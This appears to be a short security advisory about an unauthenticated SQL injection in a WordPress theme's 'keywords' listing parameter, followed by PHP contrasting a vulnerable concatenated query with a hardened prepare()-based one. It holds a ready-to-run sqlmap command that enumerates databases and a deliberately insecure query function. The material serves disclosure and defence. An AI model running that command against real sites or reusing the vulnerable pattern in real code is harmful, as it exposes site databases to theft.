The theme did not sanitise, validate or escape the keywords GET parameter from its listing page before using it in a SQL statement, leading to an unauthenticated SQL injection issue.
sqlmap --url="https://example.com/tour-list/?keywords=13&start_date=13" --random-agent --dbs --level=3 --threads=4 --dbms=MySQL -p keywords
2021-04-26
2021-04-29
2021-05-17
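The flaw class described above and its fix, as an added example that is not the theme's own code and not part of the original advisory. It assumes it runs inside WordPress; the function names, the `tours` table, its columns and the 100-character limit are hypothetical.

```php
<?php
// Added example. Hypothetical names throughout: the theme's real query is
// not shown in the advisory. Requires WordPress (global $wpdb).

// Vulnerable pattern: the GET value is unslashed and concatenated into the
// statement, so a quote character in ?keywords= ends the string literal.
function tour_search_vulnerable() {
    global $wpdb;
    $keywords = isset( $_GET['keywords'] ) ? wp_unslash( $_GET['keywords'] ) : '';
    $sql = "SELECT id, title FROM {$wpdb->prefix}tours"
         . " WHERE title LIKE '%" . $keywords . "%'";
    return $wpdb->get_results( $sql );
}

// Hardened pattern: validate the type and length, sanitise the text,
// escape LIKE wildcards, then bind the value through prepare().
function tour_search_hardened() {
    global $wpdb;
    $raw = isset( $_GET['keywords'] ) ? wp_unslash( $_GET['keywords'] ) : '';

    // ?keywords[]=x arrives as an array; only a plain string is accepted.
    if ( ! is_string( $raw ) ) {
        return array();
    }

    $keywords = sanitize_text_field( $raw );
    if ( '' === $keywords || strlen( $keywords ) > 100 ) { // assumed limit
        return array();
    }

    // esc_like() escapes % and _ so input cannot act as a wildcard;
    // prepare() quotes and escapes the whole value for the %s placeholder.
    $like = '%' . $wpdb->esc_like( $keywords ) . '%';

    return $wpdb->get_results(
        $wpdb->prepare(
            "SELECT id, title FROM {$wpdb->prefix}tours WHERE title LIKE %s",
            $like
        )
    );
}
```

Because the request needs no authentication, the same treatment applies to every other GET parameter the listing page passes to a query, not only `keywords`.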